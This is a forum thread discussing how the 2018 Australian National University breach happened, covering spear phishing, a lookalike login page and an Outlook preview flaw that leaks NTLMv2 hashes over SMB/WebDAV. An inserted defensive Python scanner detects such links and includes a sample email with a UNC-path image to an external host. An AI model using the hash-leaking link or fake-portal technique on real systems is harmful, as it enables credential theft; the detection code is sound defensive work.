How Did The ANU Hack Happen?

"On November 9, 2018, the hackers sent an email to a senior staff member at the ANU.

Another staff member, who had access to their colleague's account, previewed the email but never clicked on it.

Inside a massive cyber attack on the Australian National University that risks compromising high-ranking officials across the globe.

Even though the email was deleted, it was too late to stop the hackers, who had already accessed the senior staff member's username, password and calendar."

https://www.abc.net.au/news/2019-10-02/the-sophisticated-anu…

I don't get it. How does that work? I know very little about IT security but I will have a wild guess - brain-numbing stupidity?


Comments

  • +8

    The simplest ones basically just mimic the portal of their intranet.

    So, they'd go to ANU's webmail, then create a website that looks identical. They'd register a domain called anu.udsadfs.com, and set up the trap.

    They'd then find the senior staff members names / emails by visiting their public profiles. They then email out to one of them with something basic and wait for a reply.

    When they reply, they'll recreate their signature and then send out another email to someone else masking themselves as [email protected] with the correct signature, and ask them to view a particular intranet document. When they click on the link that's embedded in the email, it'll take them to their intranet login page which they've seen countless times. Once they enter their details, they use those details to get in.

    It's harder now with two-factor authentication, as they'd have to accept it on their phone etc.

    Edit: FYI, I've never been to ANU's portal or researched them previously. It took a minute to get the above links from Google.

    • Sorry, there was no clicking involved, according to
      https://www.abc.net.au/news/2019-10-02/anu-cyber-hack-how-pe…
      "Merely previewing the email was enough for hackers to steal a username and password that opened the first door into the ANU network."

      I too wonder how that kind of previewing can get one hacked.

      Could you shed some light on that?

      Thanks.

      Edit:
      Found the report on the ANU hack, finally. Will read it to try to figure out how previewing could get one hacked.
      https://imagedepot.anu.edu.au/scapa/Website/SCAPA190209_Publ…

      • From the Malware and Tradecraft analysis:

        The first phishing email was designed to be interaction-less and likely used some form of scripting. It is assumed the actor anticipated a high degree of security awareness on the part of the intended recipient. Unfortunately, a copy of this email was not recoverable, so further analysis is not possible. Subsequent phishing attachments were designed to harvest credentials and used similar scripts.

        And from lessons learnt:

        Phishing awareness
        As noted throughout the timeline, phishing emails were a hallmark of the activities of the actor. The social engineering which underpinned these emails highlights the vigilance needed to protect users against this form of attack. Given the methods of the actor and the number of successfully phished users, it is clear to us that more effort is required to help drive awareness and safe user behaviours across the University community. ANU will focus significantly in this area as part of a broader investment in security culture efforts under the auspices of its forthcoming strategic information security strategy. Work has already commenced with awareness training for high-risk groups.

        In addition to security culture, we have invested in stronger safeguards for our mail gateway and are expediting the retirement of legacy mail systems. These measures have already resulted in better technical protection for our mail users, and further investment will follow under the strategic program.

        They're also going to implement 2FA. Seems like there's poor logging.

      • +1

        They didn't spell it out in the report, but it was likely the CVE for Outlook preview pane remote execution https://threatpost.com/two-nasty-outlook-bugs-fixed-in-micro…

  • +1

    China just playing the Western world for fools.

    • +7

      WTF? Some unnamed analyst suspects the attack came from China based purely on beliefs, offering no evidence, and the ABC chose to report it uncritically.

      When there's no proof of who is responsible, the ABC are happy to point the finger at China. What utter garbage journalism.

      • +1

        Perhaps the analyst posted his opinion from a Huawei phone…

      • Our failed two-corporation mainstream media and the Government mouthpiece that is the ABC rarely report that the USA hacks its closest allies as well as the rest of the world.

        • The US government is on record stating that they will view any foreign cyber attack on themselves as an act of war.

  • News I just heard said their network had more holes than Swiss cheese.

    So they probably had access many ways.

    i.e. A dumb network could have the same admin password on every PC, which can be easy to get, then traverse the rest of the network and get access to admin accounts.

  • +1

    The hackers went phishing and someone took the bait.

  • +7

    The theories above are true but not applicable to the ANU hack. Rather than speculating you can actually just read the report that ANU published publicly.

    Essentially all it took was for a person who was a delegate to someone else's mailbox to preview a malicious email in Outlook. The email exploited this flaw:

    https://www.nccgroup.trust/au/about-us/newsroom-and-events/b…

    Basically, the e-mail contains a link which gets the client to connect out using either SMB or WebDAV and attempt NTLMv2 authentication. This gets the attacker a hash that can be broken if the password is simple enough (I believe that simple enough in this case includes ALL 8-character passwords regardless of their complexity with a few days of computation on some good GPUs).

    Once they had those creds they were able to use them to start exploring the ANU network and targeted other people with similar emails.

    Here is the report, you can read it yourselves:

    https://imagedepot.anu.edu.au/scapa/Website/SCAPA190209_Publ…
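    As an added illustration (not part of the thread or the ANU report), here is a mail-gateway style scanner for the link forms the comment above describes: references that make a Windows mail client open an outbound SMB (or WebDAV fallback) connection and offer NTLM authentication when the body is rendered. The sample message, the `.example.edu` internal suffix and the `203.0.113.10` host are constructed for the example.

    ```python
    import re
    from email import message_from_string
    from email.policy import default
    from html.parser import HTMLParser

    # UNC paths (\\host\share) and file://host/share URLs are resolved over SMB,
    # and Windows falls back to WebDAV when port 445 is blocked; either way the
    # client authenticates to the named host. Local file:///C:/... has no host
    # and is deliberately not matched.
    UNC_RE = re.compile(r'^(?:file://|\\\\)([^\\/]+)', re.IGNORECASE)


    class RemoteRefCollector(HTMLParser):
        """Collect every href/src value from an HTML body, including <img> tags
        that a preview pane may load without any click."""
        def __init__(self):
            super().__init__()
            self.refs = []

        def handle_starttag(self, tag, attrs):
            for name, value in attrs:
                if name in ("href", "src") and value:
                    self.refs.append((tag, value.strip()))


    def unc_host(ref):
        """Return the host a UNC or file:// reference would contact, else None."""
        m = UNC_RE.match(ref)
        return m.group(1).lower() if m else None


    def find_ntlm_leak_refs(raw_message, internal_suffix=".example.edu"):
        """Return (tag, ref, host) for each link whose rendering would send an
        SMB/WebDAV authentication to a host outside the organisation."""
        msg = message_from_string(raw_message, policy=default)
        body = msg.get_body(preferencelist=("html",))
        if body is None:
            return []
        collector = RemoteRefCollector()
        collector.feed(body.get_content())
        return [(tag, ref, host) for tag, ref in collector.refs
                if (host := unc_host(ref)) and not host.endswith(internal_suffix)]


    # Constructed sample (not a real ANU email): a normal intranet link plus a
    # 1x1 image whose source is a UNC path on an external address.
    SAMPLE = """From: colleague@example.edu
    To: senior.staff@example.edu
    Subject: Intranet document
    Content-Type: text/html; charset=utf-8

    <html><body><p>Please see the <a href="https://intranet.example.edu/doc">document</a>.</p>
    <img src="\\\\203.0.113.10\\share\\sig.png" width="1" height="1"></body></html>
    """
    ```

    Blocking outbound TCP 445 and WebDAV at the perimeter is the usual mitigation; the scanner only makes the offending reference visible before a user previews it.
    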

  • It could've been a deepbeef attack. As you can display HTML content in an email it allows the hacker to latch on to the device and capture information based on the permissions allowed.

  • If a 'preview' is all it takes, that's pretty crazy. Outlook automatically previews the latest email in the inbox, it's not like you can't not see it when you open Outlook.

    • -3

      People in this thread seem confused about the difference between clicking the email and previewing it.

      There isn't any difference, the preview involves opening the email to show you a preview.

    • I always set up outlook not to preview email. It's pretty easy.

  • +1

    Even though the email was deleted, it was too late to stop the hackers, who had already accessed the senior staff member's username, password and calendar.

    Their article to explain how the hack works is explained by the university being hacked.

    I wouldn't dare hand in an essay this lazy even in high school.

    The writer obviously doesn't know how it works either.

  • I would guess that it was a phone, most phones by default accept the images from "trusted senders" so a spoofed email address meant the phone thought the email was trusted. So it was in the normal inbox, then they opened the email, which then downloaded the email and its images. Which also included a payload infecting their phone, then the hackers probably went from there. Phone was now infected, user then took it into the secure network. Or possibly something along those lines.

    That would be my guess.

    But the other responses before me probably know more than I, so there’s a good bet I am wrong as well.

    Or some one likes looking up porn on their network but they don’t want to admit that.

  • For me it sounded like they got passwords from a phishing attack. But the difference was that it was highly targeted. Hence called spear phishing.
    With the information they got they were able to infiltrate the network and get more details required for further hacking.

    Also, they were very careful to remove any traces of their activity so they managed to continue the hack for a relatively long period undetected.

    I think it is scary to think how your information is potentially in the hands of other people's decisions. Here a uni staff member gave up passwords, which allowed for student data to be accessed.

  • +2

    previewed the email but never clicked on it.

    Hahaha… nah, that didn't happen. The dick clicked on it. All the IT peeps know it. They'd all be like "nah, he (fropanity) clicked on it, for sure…"

    • Can't blame em. When a man or woman runs out of penis enbigment pills, and you see a link for a good bargain, you click the fcuk out of it.

  • +1

    I don't believe the preview hack

    • "It is just a pop-up, I swear."

  • Haha, any details on how they organized IT security, insourced or outsourced? What companies involved? Do they teach cyber security there -lmao
